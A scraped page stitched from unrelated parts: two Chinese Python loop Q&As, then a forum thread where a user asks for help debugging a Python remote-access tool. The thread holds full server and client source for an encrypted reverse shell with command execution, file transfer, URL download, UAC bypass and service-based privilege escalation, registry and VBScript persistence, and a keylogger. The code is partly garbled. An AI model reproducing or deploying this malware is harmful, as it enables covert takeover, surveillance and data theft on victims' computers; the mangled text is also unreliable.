python tree 数据结构loop 如何写 trinary search tree

Python loop直接执行 没有循环一次输一个值怎么办_百度知道
def userin():
print (&This is a guessing number game!&)
print (&I will randomly select a integer number from 1 to 99.&)
print (&You have 6 chances to guess the number&)
print (&And you will get a hint after every guess&)
print (&---------------------------------------------------------------------------&)
print (&Let*s begin!!!&)
print secret
a=input(&Please guess the number : &)
except ValueError:
print (&You didn*t enter a valid number&)
a=input(&Please guess the number: &)
game(guess,secret)def game(guess,secret):
while guess != secret and tries & 5:
if guess & secret:
print (&====Your guess is too low !====\n&)
elif guess & secret:
print (&====Your guess is too high!====\n&)
print (&Above is your guess & + str(tries))
a=input(&Please guess the number: &)
if guess == secret:
print (&Congratulations to you! Your
guess is right ! &)
print (&The secret number was&,secret),(&Your guess is&,guess)
print (&No more guesses! Better luck next time!&)
print (&The secret number was&,secret)你的逻辑判断不是很准确,按上面代码就可以解决了。记得给我财富值
把 a=input(&Please guess the number: &)整个放到循环里
出门在外也不愁Python Loop问题_百度知道
Python Loop问题
请问在loop中如何让每一个数是上个数的两倍/n倍/一半?比如x=0while x&20:我想让x=x*2 就像x=x+1一样非常感谢.
x = 1for i in range(n):
可以试着先手动产生一个符合你规则的可迭代对象,比如列表,然后再用for从列表中逐个迭代数字来处理,比如你希望x初始值是1,后面产生的数是前面的2倍,但x不超过10:&&&for n in [2*x for x in range(1,11)]:......print n
while x&20:
some statement
出门在外也不愁[Python] NameError: name is not defined - Python - The SitePoint Forums
03:46:46 UTC
I am very new to Python. I was following a &a href ="/?p=884"&simple Python tutorial&/a&, but don't get the expected results.
After running the compiled executable on the client, the client shows up on my server. However, when I choose the client number (1), the python script is immediately exited and I get the following error when run on a remote Linux server:
Activating client: ('', 18268)
Traceback (most recent call last):
File "", line 207, in &module&
if nextcmd.startswith("download ") == True:
NameError: name 'nextcmd' is not defined
When run locally on a Windows server, the script does not exit, but the server disconnects the client as such:
Activating client: ('', 26042)
Client disconnected... ('', 26042)
I've been reading about name errors everywhere, and I can't see anything wrong with the code I'm using. I have even tried defining "nextcmd = None", but that yields the error, "python AttributeError: 'NoneType' object has no attribute 'startswith'".
Here is my server code (
#!/usr/bin/env python
from Crypto.Cipher import AES
import socket, base64, os, time, sys, select
from Crypto import Random
# the block size f must be 16, 24, or 32 for AES
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
iv =
# clear function
# Windows ---------------& cls
---------------& clear
if == 'posix': clf = 'clear'
if == 'nt': clf = 'cls'
clear = lambda: os.system(clf)
# initialize socket
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
c.bind(('', 443))
# client information
active = False
clients = []
socks = []
interval = 0.8
# Functions
# send data
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
sock.sendall(EncodeAES(cipher, cmd + end))
# receive data
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
l = sock.recv(1024)
decrypted = DecodeAES(cipher, l)
data += decrypted
if data.endswith(end) == True:
l = sock.recv(1024)
return data[:-len(end)]
# download file
def download(sock, remote_filename, local_filename=None):
# check if file exists
if not local_filename:
local_filename = remote_filename
f = open(local_filename, 'wb')
except IOError:
print "Error opening file.\
Send(sock, "cd .")
# start transfer
Send(sock, "download "+remote_filename)
print "Downloading: " + remote_filename + " & " + local_filename
fileData = Receive(sock)
# upload file
def upload(sock, local_filename, remote_filename=None):
# check if file exists
if not remote_filename:
remote_filename = local_filename
g = open(local_filename, 'rb')
except IOError:
print "Error opening file.\
Send(sock, "cd .")
# start transfer
Send(sock, "upload "+remote_filename)
print 'Uploading: ' + local_filename + " & " + remote_filename
while True:
fileData =
if not fileData: break
Send(sock, fileData, "")
Send(sock, "")
# refresh clients
def refresh():
Listening for clients...\
if len(clients) & 0:
for j in range(0,len(clients)):
print '[' + str((j+1)) + '] Client: ' + clients[j] + '\
print "...\
# print exit option
print "---\
print "[0] Exit \
Press Ctrl+C to interact with client."
# main loop
while True:
# listen for clients
# set timeout
# accept connection
s,a = c.accept()
except socket.timeout:
# add socket
socks += [s]
clients += [str(a)]
# display clients
except KeyboardInterrupt:
# display clients
# accept selection --- int, 0/1-128
activate = input("\
Enter option: ")
if activate == 0:
for j in range(0,len(socks)):
# subtract 1 (array starts at 0)
activate -= 1
# clear screen
# create a cipher object using the random secret
cipher =,AES.MODE_CFB, iv)
Activating client: ' + clients[activate] + '\
active = True
Send(socks[activate], 'Activate')
# interact with client
while active:
# receive data from client
data = Receive(socks[activate])
# disconnect client.
Client disconnected... ' + clients[activate]
# delete client
active = False
# exit client session
if data == 'quitted':
# print message
print "Exit.\
# remove from arrays
# sleep and refresh
active = False
# if data exists
elif data != '':
# get next command
nextcmd = raw_input()
# download
if nextcmd.startswith("download ") == True:
if len(nextcmd.split(' ')) & 2:
download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
download(socks[activate], nextcmd.split(' ')[1])
elif nextcmd.startswith("upload ") == True:
if len(nextcmd.split(' ')) & 2:
upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
upload(socks[activate], nextcmd.split(' ')[1])
# normal command
elif nextcmd != '':
Send(socks[activate], nextcmd)
elif nextcmd == '':
print 'Think before you type. ;)\
Here is my client code (
from Crypto.Cipher import AES
import subprocess, socket, base64, time, os, sys, urllib2, pythoncom, pyHook, logging
# the block size f must be 16, 24, or 32 for AES
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))
# generate a random secret key
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"
# server config
HOST = ''
PORT = 443
# session controller
active = False
# Functions
# send data function
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
sock.sendall(EncodeAES(cipher, cmd + end))
# receive data function
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
l = sock.recv(1024)
decrypted = DecodeAES(cipher, l)
data = data + decrypted
if data.endswith(end) == True:
l = sock.recv(1024)
return data[:-len(end)]
# prompt function
def Prompt(sock, promptmsg):
Send(sock, promptmsg)
answer = Receive(sock)
return answer
# upload file
def Upload(sock, filename):
bgtr = True
# file transfer
f = open(filename, 'rb')
fileData =
if fileData == '': break
# begin sending file
Send(sock, fileData, "")
# let server know we're done..
Send(sock, "")
return "Finished download."
# download file
def Download(sock, filename):
# file transfer
g = open(filename, 'wb')
# download file
fileData = Receive(sock)
# let server know we're done..
return "Finished upload."
# download from url (unencrypted)
def Downhttp(sock, url):
# get filename from url
filename = url.split('/')[-1].split('#')[0].split('?')[0]
g = open(filename, 'wb')
# download file
u = urllib2.urlopen(url)
# let server know we're done...
return "Finished download."
# privilege escalation
def Privs(sock):
# Windows/NT Methods
if == 'nt':
# get initial info
privinfo = '\
' + Exec('echo %USERNAME%')
privinfo += Exec('systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"')
winversion = Exec('systeminfo')
windowsnew = -1
windowsold = -1
# newer versions of windows go here
windowsnew += winversion.find('Windows 7')
windowsnew += winversion.find('Windows 8')
windowsnew += winversion.find('Windows Vista')
windowsnew += winversion.find('Windows VistaT')
windowsnew += winversion.find('Windows Server 2008')
# older versions go here (only XP)
windowsold += winversion.find('Windows XP')
windowsold += winversion.find('Server 2003')
# if it is, display privs using whoami command.
if windowsnew & 0:
privinfo += Exec('whoami /priv') + '\
# check if user is administrator
admincheck = Exec('net localgroup administrators | find "%USERNAME%"')
# if user is in the administrator group, attempt service priv. esc. using bypassuac
if admincheck != '':
privinfo += 'Administrator privilege detected.\
# if windows version is vista or greater, bypassUAC :)
if windowsnew & 0:
# prompt for bypassuac location or url
bypassuac = Prompt(sock, privinfo+'Enter location/url for BypassUAC: ')
# attempt to download from url
if bypassuac.startswith("http") == True:
c = Downhttp(sock, bypassuac)
d = os.getcwd() + '\\\\' + bypassuac.split('/')[-1]
return "Download failed: invalid url.\
# attempt to open local file
c = open(bypassuac)
d = bypassuac
return "Invalid location for BypassUAC.\
# fetch executable's location
curdir = os.path.join(sys.path[0], sys.argv[0])
# add service
if windowsnew & 0: elvpri = Exec(d + ' elevate /c sc create blah binPath= "cmd.exe /c ' + curdir + '" type= own start= auto')
if windowsold & 0: elvpri = Exec('sc create blah binPath= "' + curdir + '" type= own start= auto')
# start service
if windowsnew & 0: elvpri = Exec(d + ' elevate /c sc start blah')
if windowsold & 0: elvpri = Exec('sc start blah')
# finished.
Privilege escalation complete.\
# windows xp doesnt allow wmic c(
if windowsold & 0:
privinfo += 'Unable to escalate privileges.\
return privinfo
# attempt to search for weak permissions on applications
privinfo += 'Searching for weak permissions...\
# array for possible matches
permatch = []
permbool = False
# stage 1 outputs to text file: p1.txt
xv = Exec('for /f "tokens=2 delims=\\'=\\'" %a in (\\'wmic service list full^|find /i "pathname"^|find /i /v "system32"\\') do @echo %a && p1.txt')
# stage 2 outputs to text file: p2.txt
xv = Exec('for /f eol^=^"^ delims^=^" %a in (p1.txt) do cmd.exe /c icacls "%a" && p2.txt')
# give some time to execute commands,
# 40 sec should do it... ;)
# loop from hell to determine a match to permatch array.
dp = open('p2.txt')
lines = dp.readlines()
for line in lines:
while cp & len(permatch):
j = line.find(permatch[cp])
if j != -1:
# we found a misconfigured directory :)
if permbool == False:
privinfo += 'The following directories have write access:\
permbool = True
while True:
if len(lines[bp].split('\\\\')) & 2:
while bp &= ap:
privinfo += lines[bp]
if permbool == True: privinfo += '\
Replace executable with Python shell.\
if permbool == False: privinfo += '\
No directories with misconfigured premissions found.\
# close file
# delete stages 1 & 2
xv = Exec('del p1.txt')
xv = Exec('del p2.txt')
return privinfo
# persistence
def Persist(sock, redown=None, newdir=None):
# Windows/NT Methods
if == 'nt':
privscheck = Exec('reg query "HKU\\S-1-5-19" | find "error"')
# if user isn't system, return
if privscheck != '':
return "You must be authority\\system to enable persistence.\
# otherwise procede
# fetch executable's location
exedir = os.path.join(sys.path[0], sys.argv[0])
exeown = exedir.split('\\\\')[-1]
# get vbscript location
vbsdir = os.getcwd() + '\\\\' + 'vbscript.vbs'
# write VBS script
if redown == None: vbscript = 'state = 1\
hidden = 0\
wshname = "' + exedir + '"\
vbsname = "' + vbsdir + '"\
While state = 1\
exist = ReportFileStatus(wshname)\
If exist = True then\
set objFSO = CreateObject("Scripting.FileSystemObject")\
set objFile = objFSO.GetFile(wshname)\
if objFile.Attributes AND 2 then\
objFile.Attributes = objFile.Attributes + 2\
set objFSO = CreateObject("Scripting.FileSystemObject")\
set objFile = objFSO.GetFile(vbsname)\
if objFile.Attributes AND 2 then\
objFile.Attributes = objFile.Attributes + 2\
Set WshShell = WScript.CreateObject ("WScript.Shell")\
Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\
For Each objProcess in colProcessList\
if = "' + exeown + '" then\
vFound = True\
If vFound = True then\
wscript.sleep 50000\
WshShell.Run """' + exedir + '""",hidden\
wscript.sleep 50000\
vFound = False\
wscript.sleep 50000\
Function ReportFileStatus(filespec)\
Dim fso, msg\
Set fso = CreateObject("Scripting.FileSystemObject")\
If (fso.FileExists(filespec)) Then\
msg = True\
msg = False\
ReportFileStatus = msg\
End Function\
if newdir == None:
newdir = exedir
newexe = exeown
newexe = newdir.split('\\\\')[-1]
vbscript = 'state = 1\
hidden = 0\
wshname = "' + exedir + '"\
vbsname = "' + vbsdir + '"\
urlname = "' + redown + '"\
dirname = "' + newdir + '"\
While state = 1\
exist1 = ReportFileStatus(wshname)\
exist2 = ReportFileStatus(dirname)\
If exist1 = False And exist2 = False then\
download urlname, dirname\
If exist1 = True Or exist2 = True then\
if exist1 = True then\
set objFSO = CreateObject("Scripting.FileSystemObject")\
set objFile = objFSO.GetFile(wshname)\
if objFile.Attributes AND 2 then\
objFile.Attributes = objFile.Attributes + 2\
exist2 = False\
if exist2 = True then\
set objFSO = CreateObject("Scripting.FileSystemObject")\
set objFile = objFSO.GetFile(dirname)\
if objFile.Attributes AND 2 then\
objFile.Attributes = objFile.Attributes + 2\
set objFSO = CreateObject("Scripting.FileSystemObject")\
set objFile = objFSO.GetFile(vbsname)\
if objFile.Attributes AND 2 then\
objFile.Attributes = objFile.Attributes + 2\
Set WshShell = WScript.CreateObject ("WScript.Shell")\
Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")\
For Each objProcess in colProcessList\
if = "' + exeown + '" OR = "' + newexe + '" then\
vFound = True\
If vFound = True then\
wscript.sleep 50000\
If vFound = False then\
If exist1 = True then\
WshShell.Run """' + exedir + '""",hidden\
If exist2 = True then\
WshShell.Run """' + dirname + '""",hidden\
wscript.sleep 50000\
vFound = False\
Function ReportFileStatus(filespec)\
Dim fso, msg\
Set fso = CreateObject("Scripting.FileSystemObject")\
If (fso.FileExists(filespec)) Then\
msg = True\
msg = False\
ReportFileStatus = msg\
End Function\
function download(sFileURL, sLocation)\
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")\ "GET", sFileURL, false\
do until objXMLHTTP.Status = 200 :
wscript.sleep(1000) :
If objXMLHTTP.Status = 200 Then\
Set objADOStream = CreateObject("ADODB.Stream")\
objADOStream.Type = 1\
objADOStream.Write objXMLHTTP.ResponseBody\
objADOStream.Position = 0\
Set objFSO = Createobject("Scripting.FileSystemObject")\
If objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation\
Set objFSO = Nothing\
objADOStream.SaveToFile sLocation\
Set objADOStream = Nothing\
Set objXMLHTTP = Nothing\
End function\
# open file & write
vbs = open('vbscript.vbs', 'wb')
# add registry to startup
persist = Exec('reg ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v blah /t REG_SZ /d "' + vbsdir + '"')
persist += '\
Persistence complete.\
return persist
# execute command
def Exec(cmde):
# check if command exists
execproc = subprocess.Popen(cmde, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
cmdoutput = +
return cmdoutput
# otherwise, return
return "Enter a command.\
# keylogging function
# version 1, by K.B. Carte
# enter log filename.
LOG_FILENAME = 'keylog.txt'
def OnKeyboardEvent(event):
return True
# main loop
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# create a cipher object using the random secret
cipher =,AES.MODE_CFB, iv)
# waiting to be activated...
data = Receive(s)
# activate.
if data == 'Activate':
active = True
Send(s, "\
# interactive loop
while active:
# Receive data
data = Receive(s)
# think before you type smartass
if data == '':
# check for quit
if data == "quit" or data == "terminate":
Send(s, "quitted")
# check for change directory
elif data.startswith("cd ") == True:
stdoutput = ""
stdoutput = "Error opening directory.\
# check for download
elif data.startswith("download") == True:
# Upload the file
stdoutput = Upload(s, data[9:])
elif data.startswith("downhttp") == True:
# Download from url
stdoutput = Downhttp(s, data[9:])
# check for upload
elif data.startswith("upload") == True:
# Download the file
stdoutput = Download(s, data[7:])
elif data.startswith("privs") == True:
# Attempt to elevate privs
stdoutput = Privs(s)
elif data.startswith("persist") == True:
# Attempt persistence
if len(data.split(' ')) == 1: stdoutput = Persist(s)
elif len(data.split(' ')) == 2: stdoutput = Persist(s, data.split(' ')[1])
elif len(data.split(' ')) == 3: stdoutput = Persist(s, data.split(' ')[1], data.split(' ')[2])
elif data.startswith("keylog") == True:
# Begin keylogging
if LOG_STATE == False:
# set to True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
stdoutput = "Logging keystrokes to: "+LOG_FILENAME+"...\
# set to False
stdoutput = "Keystrokes have been logged to: "+LOG_FILENAME+".\
# execute command.
stdoutput = Exec(data)
# send data
stdoutput = stdoutput+"\
Send(s, stdoutput)
# loop ends here
if data == "terminate":
except socket.error:
I would appreciate any pointers. Thanks.
07:55:35 UTC
I made an addition to the following if-statement:
elif data != '':
# get next command
nextcmd = raw_input()
elif data == '':
nextcmd = raw_input()
nextcmd = raw_input()
That fixes the NameError I was experiencing. However, I'm getting unexpected results. Now what happens is... I open xmulti_aeshell.exe on my client machine. Then I run from my server, and immediately when the client IP shows up on my server, the xmulti_aeshell.exe process closes on my client machine!
I can't understand why xmulti_aeshell.exe is closing on my client machine as soon as it shows up on my server. I am using Python 2.7 under Ubuntu on my server. My client machine is using Windows 7 64 bit (I made the Windows executable using PyInstaller-2.1). Any ideas?
05:34:39 UTC
nextcmd is only set if data != '' and if there is no data received (possibly a socket timeout?) then nextcmd would not be defined.
I guess I would set nextcmd = None
somewhere before:
while active:
It would have been nice if Discourse supported source code line numbers
but I guess we can't have everything.
04:01:07 UTC


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